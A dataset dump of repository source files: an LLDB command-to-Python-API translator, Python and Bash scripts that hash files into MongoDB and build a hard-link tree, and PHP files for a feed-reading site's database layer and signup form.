\"lldb.SBBreakpoint.SetEnabled(False)\",\n ],\n \"breakpoint enable\": [\n \"lldb.SBTarget.EnableAllBreakpoints\",\n \"lldb.SBBreakpoint.SetEnabled(True)\",\n ],\n \"breakpoint list\": [\n \"lldb.SBTarget.breakpoint_iter\",\n \"lldb.SBTarget.GetNumBreakpoints\",\n \"lldb.SBTarget.GetBreakpointAtIndex\",\n # \"lldb.SBTarget.GetBreakpointNames\",\n ],\n \"breakpoint modify\": [\n \"lldb.SBBreakpoint.SetAutoContinue\",\n \"lldb.SBBreakpoint.SetCondition\",\n \"lldb.SBBreakpoint.SetIgnoreCount\",\n \"lldb.SBBreakpoint.SetOneShot\",\n \"lldb.SBBreakpoint.SetQueueName\",\n \"lldb.SBBreakpoint.SetThreadIndex\",\n \"lldb.SBBreakpoint.SetThreadName\",\n # \"lldb.SBBreakpoint.SetThreadID\"\n ],\n \"breakpoint name\": [\n \"lldb.SBBreakpoint.AddName\",\n \"lldb.SBBreakpoint.GetNames\",\n \"lldb.SBBreakpoint.MatchesName\",\n \"lldb.SBBreakpoint.RemoveName\",\n ],\n\n ### Register Commands\n \"register read\": [\n \"lldb.SBFrame.FindRegister\",\n \"lldb.SBFrame.GetRegisters\",\n ],\n\n # Memory Commands\n \"memory read\": [\n \"lldb.SBProcess.ReadMemory\",\n \"lldb.SBTarget.ReadMemory\",\n ],\n \"memory write\": [\n \"lldb.SBProcess.WriteMemory\",\n ],\n}\n\n# Translate regexp commands to their analagous full command.\nRegexCommands = {\n \"_regexp-break\": \"breakpoint set\",\n \"_regexp-jump\": \"thread jump\",\n}\n\ndef _breakpoint_modify_parser():\n parser = argparse.ArgumentParser(prog=\"breakpoint modify\")\n parser.add_argument('--auto-continue', '-C')\n parser.add_argument('--condition', '-c')\n parser.add_argument('--disable', '-d', action='store_const', const=True, default=None)\n parser.add_argument('--enable', '-e', action='store_const', const=True, default=None)\n parser.add_argument('--ignore-count', '-i')\n parser.add_argument('--one-shot', '-o')\n parser.add_argument('--queue-name', '-q')\n parser.add_argument('--thread-index', '-x')\n parser.add_argument('--thread-name', '-T')\n return parser\n\nCommandParsers = {\n \"breakpoint modify\": _breakpoint_modify_parser(),\n}\n\nCommandFlagAPIs = {\n \"breakpoint modify\": {\n \"auto_continue\": \"lldb.SBBreakpoint.SetAutoContinue\",\n \"condition\": \"lldb.SBBreakpoint.SetCondition\",\n \"disable\": \"lldb.SBBreakpoint.SetEnabled(False)\",\n \"enable\": \"lldb.SBBreakpoint.SetEnabled(True)\",\n \"ignore_count\": \"lldb.SBBreakpoint.SetIgnoreCount\",\n \"one_shot\": \"lldb.SBBreakpoint.SetOneShot\",\n \"queue_name\": \"lldb.SBBreakpoint.SetQueueName\",\n \"thread_index\": \"lldb.SBBreakpoint.SetThreadIndex\",\n \"thread_name\": \"lldb.SBBreakpoint.SetThreadName\",\n }\n}\n\n# [one, two, three] -> \"(one|two|three)\\b\"\nKnownCommands = re.compile(r\"({})\\b\".format(\n \"|\".join(CommandAPIs.keys() + RegexCommands.keys())))\n\[email protected](\"topython\")\ndef topython(debugger, command, context, result, _internal):\n \"\"\"Translate LLDB commands to Python API\"\"\"\n\n if not command:\n result.SetError(\"Usage: topython <lldb-command>\")\n return\n\n # Expand aliases and abbreviations into their base command.\n resolve_result = lldb.SBCommandReturnObject()\n debugger.GetCommandInterpreter().ResolveCommand(command, resolve_result)\n if not resolve_result.Succeeded():\n result.SetError(\"Nonexistent command: \" + command)\n return\n expanded_command = resolve_result.GetOutput()\n\n # Match the fully resolved command against supported commands. In addition\n # to checking for a known command, this also strips flags and arguments.\n match = KnownCommands.match(expanded_command)\n if not match:\n result.SetError(\"Unsupported command: \" + command)\n return\n known_command = match.group(0)\n\n # Convert regex commands into core commands.\n if known_command in RegexCommands:\n known_command = RegexCommands[known_command]\n\n parser = CommandParsers.get(known_command)\n if parser:\n command_args = expanded_command[len(known_command):]\n parsed_args, _ = parser.parse_known_args(shlex.split(command_args))\n\n # Exrtract just the flag names given in the command.\n command_flags = [\n name\n for name, value in vars(parsed_args).iteritems()\n if value is not None\n ]\n\n if command_flags:\n flagAPIs = CommandFlagAPIs[known_command]\n for flag in command_flags:\n _print_help(flagAPIs[flag])\n return\n\n APIs = CommandAPIs.get(known_command)\n if APIs is None:\n result.SetError(\"Incomplete support, missing API info for `{}`\".format(command))\n return\n\n if len(APIs) > 2:\n # Print just the APIs by name, but not their help() documentation, to\n # avoid printing too much detail.\n for API in APIs:\n print API\n return\n\n for API in APIs:\n _print_help(API)\n\ndef _print_help(API):\n match = re.match(r\"[^(]+\", API)\n assert match\n help(match.group(0))\n # Also print full API when it contains parameter info.\n if \"(\" in API:\n print API\n" } ]
2
rednutsoftware/hashed_link_tree
https://github.com/rednutsoftware/hashed_link_tree
aa2199b7a40e77c634ea09123e2fcdb404fe2e97
525e8aa8721e5b974d641442a23f69ad4a0932a0
d09149b99a8229742553f97775f541c7a472dcde
refs/heads/master
2020-06-21T16:55:09.699256
2020-02-06T08:37:04
2020-02-06T08:37:04
197,507,865
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5608552694320679, "alphanum_fraction": 0.5756579041481018, "avg_line_length": 17.42424201965332, "blob_id": "28b7a20c21c2f7df6de6d6f7e09b76602a6b64d6", "content_id": "9d23f6864550497f16f887bbda1bf8586f0e0481", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 608, "license_type": "permissive", "max_line_length": 86, "num_lines": 33, "path": "/bin/dump_db.sh", "repo_name": "rednutsoftware/hashed_link_tree", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nPROG=\"$(basename $0)\"\nCUR_DIR=\"$(pwd)\"\n\ncd $(dirname $0)\nBIN_DIR=\"$(pwd)\"\n\ncd ..\nTOP_DIR=\"$(pwd)\"\nLOG_DIR=\"$TOP_DIR/log\"\nDATA_DIR=\"$TOP_DIR/data\"\nETC_DIR=\"$TOP_DIR/etc\"\n\nLOG=\"$LOG_DIR/dump_db.log\"\nDMP_DIR=$(date +\"$DATA_DIR/mongo_dump_%Y%m%d%H%M%S\")\nDMP_TBZ=\"${DMP_DIR}.tbz\"\n\ncd \"${CUR_DIR}\"\n\n#\numask 0\n\n## dump database\ndate +\"==== %c: BEGIN dump database\" | tee -a $LOG\n\nmongodump -o $DMP_DIR 2>&1 | tee -a $LOG\ntar cjfv \"$DMP_TBZ\" -C \"$(dirname $DMP_DIR)\" \"$(basename $DMP_DIR)\" 2>&1 | tee -a $LOG\nrm -rf $DMP_DIR 2>&1 | tee -a $LOG\n\ndate +\"---- %c: END dump database\" | tee -a $LOG\n\n# EOF\n" }, { "alpha_fraction": 0.5062440037727356, "alphanum_fraction": 0.5216138362884521, "avg_line_length": 27.88888931274414, "blob_id": "9fa0c7d1081542b127ffa42c70c7d5ddc74bc463", "content_id": "095921967beb6b323124ad86875c70ea3fc663de", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1041, "license_type": "permissive", "max_line_length": 84, "num_lines": 36, "path": "/bin/check_tree.py", "repo_name": "rednutsoftware/hashed_link_tree", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nimport os\nimport sys\nimport pymongo\nimport time\nfrom stat import *\n\nfiles=0\n\ndef visitcollection( lbase, collection, limit=0 ):\n global files\n print( \"limit[%d]\" % ( limit ) )\n for rec in collection.find():\n files += 1\n md5 = rec[ 'md5' ]\n path = rec[ 'path' ]\n ldir = os.path.join( lbase, md5[ 0 ], md5[ 1 ], md5[ 2 ] )\n lpath = os.path.join( ldir, md5 )\n if ( files == limit ):\n return\n if ( os.path.exists( lpath ) ):\n nlink = os.stat( lpath ).st_nlink\n if ( nlink == 1 ):\n print( \"STRAY[%s]<-[%s]\" % ( lpath, path ) )\n else:\n print( \"NTFND[%s]<-[%s]\" % ( lpath, path ) )\n\nif __name__ == '__main__':\n t_start = time.clock()\n mongoc = pymongo.MongoClient()\n db = mongoc.mydb\n collection = db.filehash\n visitcollection( sys.argv[1], collection, int( sys.argv[2] ) )\n t_end = time.clock()\n print( \"finally processed %d files in %f[sec].\" % ( files, (t_end - t_start) ) )\n\n" }, { "alpha_fraction": 0.5489614009857178, "alphanum_fraction": 0.5612547397613525, "avg_line_length": 30.440000534057617, "blob_id": "8a1d14968e68b859b310a2c9a2061f51266871de", "content_id": "eb081191767f431fa2338ea4cca44f7b9f9e4d2a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2359, "license_type": "permissive", "max_line_length": 84, "num_lines": 75, "path": "/bin/mk_db.py", "repo_name": "rednutsoftware/hashed_link_tree", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nimport os\nimport sys\nfrom stat import *\nimport pymongo\nimport hashlib\nimport time\n\ndef walktree(base, dir, callback, collection):\n '''recursively descend the directory tree rooted at top,\n calling the callback function for each regular file'''\n\n top = os.path.join(base, dir)\n for f in os.listdir(top):\n pathname = os.path.join(top, f)\n mode = os.stat(pathname).st_mode\n if f in [ '.@__thumb', '.git', '.svn' ] :\n print( 'Skipping %s' % pathname )\n elif S_ISDIR(mode):\n # It's a directory, recurse into it\n d = os.path.join(dir, f)\n walktree(base, d, callback, collection)\n elif S_ISREG(mode):\n # It's a file, call the callback function\n callback(base, dir, f, collection)\n else:\n # Unknown file type, print a message\n print('Skipping %s' % pathname)\n\ndef get_md5(file, size=4096):\n md5 = hashlib.md5()\n with open(file, 'rb') as f:\n for chunk in iter(lambda: f.read(size * md5.block_size), b''):\n md5.update(chunk)\n return md5.hexdigest()\n\nfiles=0\n\ndef visitfile(base, dir, fname, collection):\n global files\n files = files + 1\n if ( files % 100 == 0 ):\n print( 'processed ', files, ' files' )\n file = os.path.join( base, dir, fname )\n path = os.path.join( dir, fname )\n fstat = os.stat( file )\n md5 = get_md5( file )\n rec = {};\n rec[ 'path' ] = path\n rec[ 'size' ] = fstat.st_size\n rec[ 'mtime' ] = fstat.st_mtime\n rec[ 'md5' ] = md5\n ret = collection.find_one( { 'path': path } )\n if ret is not None:\n if ( ret[ 'md5' ] == rec[ 'md5' ] ):\n return\n ret = collection.find_one( { 'md5': md5, 'size': { '$ne': fstat.st_size } } )\n if ret is not None:\n print( 'different size but same md5:', rec, ret )\n return\n ret = collection.replace_one( { 'path': path }, rec, True )\n upd = ''\n if ret.matched_count != 0:\n upd = '(updated)'\n print( rec, upd )\n\nif __name__ == '__main__':\n t_start = time.clock()\n mongoc = pymongo.MongoClient()\n db = mongoc.mydb\n collection = db.filehash\n walktree(sys.argv[1], sys.argv[2], visitfile, collection)\n t_end = time.clock()\n print( \"finally processed %d files in %f[sec].\" % ( files, (t_end - t_start) ) )\n\n" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.75, "avg_line_length": 27, "blob_id": "81fd9d125282b57982523def6cd78ba04b7f7981", "content_id": "f33b8f607172315e5caceb5e0cbeb25a0d0a2569", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 56, "license_type": "permissive", "max_line_length": 36, "num_lines": 2, "path": "/README.md", "repo_name": "rednutsoftware/hashed_link_tree", "src_encoding": "UTF-8", "text": "# hashed_link_tree\nhash files and make (hard) link tree\n" }, { "alpha_fraction": 0.561170220375061, "alphanum_fraction": 0.5744680762290955, "avg_line_length": 13.745098114013672, "blob_id": "5d3cc6ba45629fc81babb5ad213e673b34ce6651", "content_id": "b7324c0bb2c6e6d17cb7e2164a57f802d3eda224", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 752, "license_type": "permissive", "max_line_length": 69, "num_lines": 51, "path": "/bin/mk_db.sh", "repo_name": "rednutsoftware/hashed_link_tree", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nPROG=\"$(basename $0)\"\nCUR_DIR=\"$(pwd)\"\n\ncd $(dirname $0)\nBIN_DIR=\"$(pwd)\"\n\ncd ..\nTOP_DIR=\"$(pwd)\"\nLOG_DIR=\"$TOP_DIR/log\"\nDATA_DIR=\"$TOP_DIR/data\"\nETC_DIR=\"$TOP_DIR/etc\"\n\nMK_DB_CMD=\"$BIN_DIR/mk_db.py\"\nMK_DB_LOG=\"$LOG_DIR/mk_db.log\"\n\ncd \"${CUR_DIR}\"\n\n#\nPROFILE=/etc/profile.d/python3.bash\nif [ -f $PROFILE ]\nthen\n . $PROFILE\nfi\n\nif [ $# -lt 2 ]\nthen\n echo \"usage: $PROG <HASH_BASE_DIR> <HASH_DIR1> [<HASH_DIR2> ...]\"\n exit\nfi\n\n#\numask 0\n\n## make database\nHASH_BASE_DIR=$1\nshift\n\ndate +\"==== %c\" | tee -a $MK_DB_LOG\n\nfor d in $*\ndo\n echo \"making database for $HASH_BASE_DIR/$d\" | tee -a $MK_DB_LOG\n $MK_DB_CMD $HASH_BASE_DIR $d | tee -a $MK_DB_LOG 2>&1\n date | tee -a $MK_DB_LOG\ndone\n\necho \"----\" | tee -a $MK_DB_LOG\n\n# EOF\n" }, { "alpha_fraction": 0.5835654735565186, "alphanum_fraction": 0.597493052482605, "avg_line_length": 14.608695983886719, "blob_id": "c891620d02bc48cad25ce93d8583609c3ca8c9d9", "content_id": "9a0e5b641f13be89051e129be454f3d8119d6ada", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 718, "license_type": "permissive", "max_line_length": 71, "num_lines": 46, "path": "/bin/check_tree.sh", "repo_name": "rednutsoftware/hashed_link_tree", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nPROG=\"$(basename $0)\"\nCUR_DIR=\"$(pwd)\"\n\ncd $(dirname $0)\nBIN_DIR=\"$(pwd)\"\n\ncd ..\nTOP_DIR=\"$(pwd)\"\nLOG_DIR=\"$TOP_DIR/log\"\nDATA_DIR=\"$TOP_DIR/data\"\nETC_DIR=\"$TOP_DIR/etc\"\n\nCHECK_TREE_CMD=\"$BIN_DIR/check_tree.py\"\nCHECK_TREE_LOG=\"$LOG_DIR/check_tree.log\"\n\ncd \"${CUR_DIR}\"\n\n#\nPROFILE=/etc/profile.d/python3.bash\nif [ -f $PROFILE ]\nthen\n . $PROFILE\nfi\n\nif [ $# -lt 1 ]\nthen\n echo \"usage: $PROG <LINK_BASE_DIR> [<LIMIT>]\"\n exit\nfi\n\n#\numask 0\n\n## check files\nLINK_BASE_DIR=\"$1\"\nLIMIT=\"${2:-0}\"\n\ndate +\"==== %c: BEGIN check link tree\" | tee -a $CHECK_TREE_LOG\n\n$CHECK_TREE_CMD \"$LINK_BASE_DIR\" \"$LIMIT\" 2>&1 | tee -a $CHECK_TREE_LOG\n\ndate +\"---- %c: END check link tree\" | tee -a $CHECK_TREE_LOG\n\n# EOF\n" }, { "alpha_fraction": 0.5810276865959167, "alphanum_fraction": 0.5955204367637634, "avg_line_length": 15.14893627166748, "blob_id": "65c046cd064512bcbbedc9c545d72bcd8fa85204", "content_id": "d48353adaffeb736b0236f77afb43953a85b63bf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 759, "license_type": "permissive", "max_line_length": 86, "num_lines": 47, "path": "/bin/link_tree.sh", "repo_name": "rednutsoftware/hashed_link_tree", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nPROG=\"$(basename $0)\"\nCUR_DIR=\"$(pwd)\"\n\ncd $(dirname $0)\nBIN_DIR=\"$(pwd)\"\n\ncd ..\nTOP_DIR=\"$(pwd)\"\nLOG_DIR=\"$TOP_DIR/log\"\nDATA_DIR=\"$TOP_DIR/data\"\nETC_DIR=\"$TOP_DIR/etc\"\n\nLINK_TREE_CMD=\"$BIN_DIR/link_tree.py\"\nLINK_TREE_LOG=\"$LOG_DIR/link_tree.log\"\n\ncd \"${CUR_DIR}\"\n\n#\nPROFILE=/etc/profile.d/python3.bash\nif [ -f $PROFILE ]\nthen\n . $PROFILE\nfi\n\nif [ $# -lt 2 ]\nthen\n echo \"usage: $PROG <FILE_BASE_DIR> <LINK_BASE_DIR> [<LIMIT>]\"\n exit\nfi\n\n#\numask 0\n\n## link files\nFILE_BASE_DIR=\"$1\"\nLINK_BASE_DIR=\"$2\"\nLIMIT=\"${3:-0}\"\n\ndate +\"==== %c: BEGIN make link tree\" | tee -a $LINK_TREE_LOG\n\n$LINK_TREE_CMD \"$FILE_BASE_DIR\" \"$LINK_BASE_DIR\" \"$LIMIT\" 2>&1 | tee -a $LINK_TREE_LOG\n\ndate +\"---- %c: END make link tree\" | tee -a $LINK_TREE_LOG\n\n# EOF\n" }, { "alpha_fraction": 0.5358565449714661, "alphanum_fraction": 0.5517928004264832, "avg_line_length": 29.393939971923828, "blob_id": "ad64dff70284c94030053a2a8624ce48ed28a2ff", "content_id": "658c29070d8d4686e3cb52370c289fd1d61421f3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1004, "license_type": "permissive", "max_line_length": 84, "num_lines": 33, "path": "/bin/link_tree.py", "repo_name": "rednutsoftware/hashed_link_tree", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nimport os\nimport sys\nimport pymongo\nimport time\n\nfiles=0\n\ndef visitcollection( fbase, lbase, collection, limit=0 ):\n global files\n for rec in collection.find():\n files += 1\n md5 = rec[ 'md5' ]\n path = rec[ 'path' ]\n ldir = os.path.join( lbase, md5[ 0 ], md5[ 1 ], md5[ 2 ] )\n lpath = os.path.join( ldir, md5 )\n fpath = os.path.join( fbase, path )\n if files == limit:\n return\n if ( os.path.exists( fpath ) and not os.path.exists( lpath ) ):\n os.makedirs( ldir, exist_ok=True )\n os.link( fpath, lpath )\n print( \"[%s]->[%s]\" % ( fpath, lpath ) )\n\nif __name__ == '__main__':\n t_start = time.clock()\n mongoc = pymongo.MongoClient()\n db = mongoc.mydb\n collection = db.filehash\n visitcollection( sys.argv[1], sys.argv[2], collection, int( sys.argv[3] ) )\n t_end = time.clock()\n print( \"finally processed %d files in %f[sec].\" % ( files, (t_end - t_start) ) )\n\n" } ]
8
TheProjecter/watercooler-content-distribution
https://github.com/TheProjecter/watercooler-content-distribution
90243edd1d95d1b61b5f4ffa197466042c63557f
1f289da8fbcb5f8191b6c306557662863f13b55c
ec11cd65ae2dd703d65f7a395fd53bb29b06fe33
refs/heads/master
2021-01-10T15:13:08.433552
2010-06-11T01:34:16
2010-06-11T01:34:16
43,166,857
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5531034469604492, "alphanum_fraction": 0.5586206912994385, "avg_line_length": 32, "blob_id": "bcca076e7e7bdb04bff272dc5a1f5dd40ac04d93", "content_id": "0fb9725b29cbba42b9e1adeda5a34be221b479e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 725, "license_type": "no_license", "max_line_length": 214, "num_lines": 22, "path": "/www/trunk/getStories.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\ninclude_once('db_init.php');\nif (isset($_REQUEST['id'])) {\n $feed = Feed::find('id', $_REQUEST['id']);\n if ($feed === NULL)\n echo '<h1>Feed not found</h1>';\n else\n echo getFeedOutput($feed);\n}\n\nfunction getFeedOutput($feed) {\n $stories = $feed->stories->get(array('url', 'title', 'content', 'timestamp'), 'timestamp');\n $contents = '<ul>';\n foreach ($stories as $story)\n {\n $date = date('F\\ j\\,\\ Y\\ g:i\\ A\\ T',$story['timestamp']);\n $contents .= \"<li class=\\\"story\\\"><h3><a href=\\\"{$story['url']}\\\" target=\\\"_blank\\\">{$story['title']}</a></h3><div class=\\\"storyDate\\\">{$date}</div><div class=\\\"storyContent\\\">{$story['content']}</div></li>\";\n }\n $contents .= '</ul>';\n\n return $contents;\n}" }, { "alpha_fraction": 0.6665307879447937, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 37.7315788269043, "blob_id": "53d75494c4267ef6f7e55175ee4da8e033814c33", "content_id": "24395a8d41a41b633e765a3e64022fe0bc3a0e02", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 7359, "license_type": "no_license", "max_line_length": 79, "num_lines": 190, "path": "/www/trunk/db_mysql.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\nrequire_once('db.php');\n\n/* class MySQLDBObject provides a base class for all classes which\n represent objects in a MySQL database\n*/\nclass MySQLDBObject extends DatabaseObject {\n /* $pdo is defined here so sibling classes to MySQLDB can access its\n PDO and thus perform low-level operations on a given MySQL database */\n protected $pdo;\n\n /* $userattrs_to_cols is an associative array mapping attribute names given \n as the $userinfo parameter to methods in classes derived from this one to\n column names in the MySQL database. Note that the following attributes are\n missing and require special handling\n 'carrier': column 'cid' needs to be looked up in 'carriors' table by\n 'carrior_name' and entered in user table under column 'cid' \n 'send_email', \n 'send_sms_text',\n 'send_sms_link': reception methods need to be accessed in 'receptions'\n table\n 'feeds': feeds need to be accessed in the 'favorites' table */\n protected static $userattrs_to_cols = \n array('uid'=>'uid',\n\t 'id'=>'uid',\n\t 'username'=>'username',\n\t 'email'=>'email',\n\t 'password'=>'password',\n\t 'phone_number'=>'phone_number',\n\t 'phone_pin'=>'phone_status', 'phone_confirmed'=>'phone_status',\n\t 'email_pin'=>'email_status', 'email_confirmed'=>'email_status');\n\n /* $feedattrs_to_cols is an associative array mapping attribute names given \n as the $feedinfo parameter to methods in classes derived from this one to\n column names in the MySQL database. */\n protected static $feedattrs_to_cols =\n array('sid'=>'sid',\n\t 'id'=>'sid',\n\t 'name'=>'source_name',\n\t 'url'=>'source_url');\n\n /* $storyattrs_to_cols is an associative array mapping attribute names given \n as the $storyinfo parameter to methods in classes derived from this one to\n column names in the MySQL database. Note that the following attributes are\n missing and require special handling\n 'feed': feed source need to be accessed in the 'feed_sources' table by\n 'fid' column\n 'category': category need to be accessed in the 'feed_categories' table\n by 'gid' column\n */\n protected static $storyattrs_to_cols =\n array('fid'=>'fid',\n\t 'id'=>'fid',\n\t 'title'=>'title',\n\t 'content'=>'content',\n\t 'url'=>'url',\n\t 'timestamp'=>'time_stamp');\n}\n\n/* class MySQLDB implements iDatabase on MySQL databases (see corresponding \n documentation)\n*/\nclass MySQLDB extends MySQLDBObject implements iDatabase {\n/* string MySQLDB::cfg_ini_main_section is the name of the section in \n the ini config files passed to MySQLDB::connectFromIni containing the\n main connection parameters. This is also the base prefix for the opts ini \n section which is named MySQLDB::cfg_ini_main_section.' opts'.\n*/\n const cfg_ini_main_section = __CLASS__;\n\n /* $dsn_cfg_vars is an array of the the connection variables from which the\n dsn (the first argument to the PDO constructor) should be constructed */\n private static $dsn_cfg_vars = array('host', 'port', 'dbname');\n\n/* function MySQLDB::__construct is the constructor for the class\n\n $pdo: (PDO object) a valid PDO object connected to the MySQL database to use\n*/\n private function __construct(PDO $pdo) {\n $this->pdo = $pdo;\n }\n\n/* function MySQLDB::setAsSiteDefault implements \n iDatabase::setAsSiteDefault (see corresponding documentation)\n*/\n public function setAsSiteDefault() {\n self::$site_db = $this;\n }\n\n/* function MySQLDB::getSiteDefault implements \n iDatabase::getSiteDefault (see corresponding documentation)\n*/\n public static function getSiteDefault() {\n return self::$site_db;\n }\n\n/* function MySQLDB::connect implements iDatabase::connect (see \n corresponding documentation)\n\n $cfg_vars: (array) the configuration variables for the database connection,\n encoded in the following key-value pairs:\n 'username': (string) the username to use to connect to the MySQL\n server\n 'password': (string) the password to use to connect to the MySQL\n server\n 'host': (string) the hostname or ip address of the mysql server,\n or NULL to use the PHP default\n 'port': (integer) the port on which to connect, or NULL to use\n the PHP default\n 'dbname': (string) the name of the database to use on the MySQL\n server (required)\n 'opts': (array) an associative array of PDO connection options,\n or NULL for PHP defaults (see PHP Manual documentation for PDO\n and the PDO MySQL driver)\n\n returns a MySQLDB object connected to the database\n*/\n public static function connect(array $cfg_vars) {\n if (!isset($cfg_vars['dbname']))\n\tthrow new InvalidArgumentException('dbname is a required key-value '.\n\t\t\t\t\t 'pair in parameter $cfg_vars');\n\n // construct dsn string\n $dsn = 'mysql:';\n foreach (self::$dsn_cfg_vars as $varname)\n if (isset($cfg_vars[$varname]))\n\t$dsn .= \"$varname={$cfg_vars[$varname]};\";\n\n // create PDO object\n $pdo = new PDO($dsn, $cfg_vars['username'], $cfg_vars['password'], \n\t\t $cfg_vars['opts']);\n\n // set PDO error mode so that we get exceptions instead of PHP errors\n $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);\n\n // construct MySQLDB object\n $c = __CLASS__;\n $db = new $c($pdo);\n\n return $db;\n }\n\n/* function MySQLDB::connectFromIni implements iDatabase::connectFromIni\n (see corresponding documentation)\n\n $cfg_file: (string) the ini file to read connection configuration variables\n from, encoded in the var-value pairs listed in the documentation\n\t for MySQLDB::connect, split into the following sections:\n\t Section 'MySQLDB' contains\n\t 'username', 'password', 'host', 'port', 'dbname'\n\t Section 'MySQLDB opts' contains\n\t the PDO connection options, encoded in var-value pairs with the\n\t\tvariable names being names of PDO constants, and the values\n\t\tbeing the desired corresponding values for the options. Note\n\t\tthat values MUST be single quoted to avoid values from being\n\t\tinterpreted by PHP (see PHP Manual documentation for PDO and\n\t\tthe PDO MySQL driver for PDO connection options).\n\n returns a MySQLDB object connected to the database\n*/\n public static function connectFromIni($cfg_file) {\n $cfg = @parse_ini_file($cfg_file, TRUE);\n if ($cfg === FALSE) {\n $e = error_get_last();\n throw new ErrorException($e['message'], 0, $e['type'], \n\t\t\t $e['file'], $e['line']);\n }\n\n $cfg_vars = $cfg[self::cfg_ini_main_section];\n\n // parse PDO options\n if (isset($cfg[self::cfg_ini_main_section.' opts']))\n foreach ($cfg[self::cfg_ini_main_section.' opts'] as $key=>$value)\n\t$cfg_vars['opts'][constant($key)] = $value;\n\n return self::connect($cfg_vars);\n }\n\n public function getFeeds() {\n static $feeds_sql = 'SELECT sid FROM feed_sources;';\n $feeds_stmt = $this->pdo->prepare($feeds_sql);\n $feeds_stmt->execute();\n /* XXX creating the objects this way relies on DB consistency (sid is not\n checked to be existent in feed_sources table) */\n $feeds_stmt->setFetchMode(PDO::FETCH_CLASS, 'MySQLFeed', \n\t\t\t array('db'=>$this));\n $feeds_result = $feeds_stmt->fetchAll();\n return new MySQLFeeds($feeds_result, $this);\n }\n}\n" }, { "alpha_fraction": 0.5847525000572205, "alphanum_fraction": 0.5943020582199097, "avg_line_length": 28.777250289916992, "blob_id": "6a659e02dc5dcac282acf801a4f26c5d39eb645a", "content_id": "a068f511129c49d0081e8e8065369c5ea322a503", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 6283, "license_type": "no_license", "max_line_length": 168, "num_lines": 211, "path": "/www/trunk/newsignup.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\"\n\t \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html lang=\"EN\" dir=\"ltr\" xmlns=\"http://www.w3.org/1999/xhtml\">\n <head>\n <meta http-equiv=\"content-type\" content=\"text/xml; charset=utf-8\" />\n <title>Sign up</title>\n <link rel=\"stylesheet\" href=\"signup.css\" title=\"signup\" />\n </head>\n <body>\n <div class=\"corner\">\n <a href=\"index.php\">home</a>\n </div>\n <h1>Sign up</h1>\n <form action=\"<?php echo $_SERVER['PHP_SELF'];?>\" method=\"post\">\n <fieldset>\n\t<legend>Personal Information</legend>\n\t<p><label for=\"name\">Username</label>\n\t <input id=\"name\" type=\"text\" name=\"userName\" maxlength=\"25\"/></p>\n\t<p><label for=\"pass\">Password</label>\n\t <input id=\"pass\" type=\"password\" name=\"userPassword\" maxlength=\"10\" /></p>\n\t<p><label for=\"repeatPass\">Repeat Password</label>\n <input id=\"repeatPass\"type=\"password\" name=\"userRepeatPass\" maxlength=\"10\"/></p>\n\t<p><label for=\"email\">Email</label>\n\t <input id=\"email\" type=\"text\" name=\"userEmail\" maxlength=\"50\"/></p>\n\t<p><label for=\"cell\">Cell Phone #</label>\n <input id=\"cell\" type=\"text\" name=\"userCell\" maxlength=\"10\"/></p>\n\t<p><label for=\"carrier\">Carrier</label>\n\t <select id=\"carrier\" name=\"userCarrier\">\n\t <option value=\"att\">AT&#38;T</option>\n\t <option value=\"verizon\">Verizon</option>\n\t</select></p>\n\t<p><label for=\"reception\">Default Methods of Reception</label>\n\t <object class=\"multifield\"><input type=\"checkbox\" name=\"receive_email\" value=\"yes\" />Email<br />\n\t <input type=\"checkbox\" name=\"receive_sms_text\" value=\"yes\" />SMS (Text)<br />\n\t <input type=\"checkbox\" name=\"receive_sms_link\" value=\"yes\" />SMS (Link)<br /></object></p>\n\t<p><label for=\"feeds\">Feeds</label> <br />\n\t <object class=\"multifield\">\n\t <input type=\"text\" name=\"feed1\" maxlength=\"500\"/><br />\n\t <input type=\"text\" name=\"feed2\" maxlength=\"500\"/><br />\n\t <input type=\"text\" name=\"feed3\" maxlength=\"500\"/><br />\n\t <a href=\"#\">Add More Feeds</a>\n\t </object>\n\t</p>\n\t<input class=\"rightcolumn\" type=\"submit\" name=\"submit\" value=\"Sign Up\" />\n </fieldset>\n </form>\n </div>\n <div class=\"validated\">\n <a href=\"http://validator.w3.org/check?uri=referer\"><img src=\"http://www.w3.org/Icons/valid-xhtml10\" alt=\"Valid XHTML 1.0 Strict\" /></a>\n </div>\n</body>\n</html>\n\n<?php\n /**\n * This function can be used to check the sanity of variables\n * @param string $type The type of variable can be bool, float, numeric, string, array, or object\n * @param string $string The variable name you would like to check\n * @param string $length The maximum length of the variable\n *\n * return bool\n */\n function sanityCheck($string, $type, 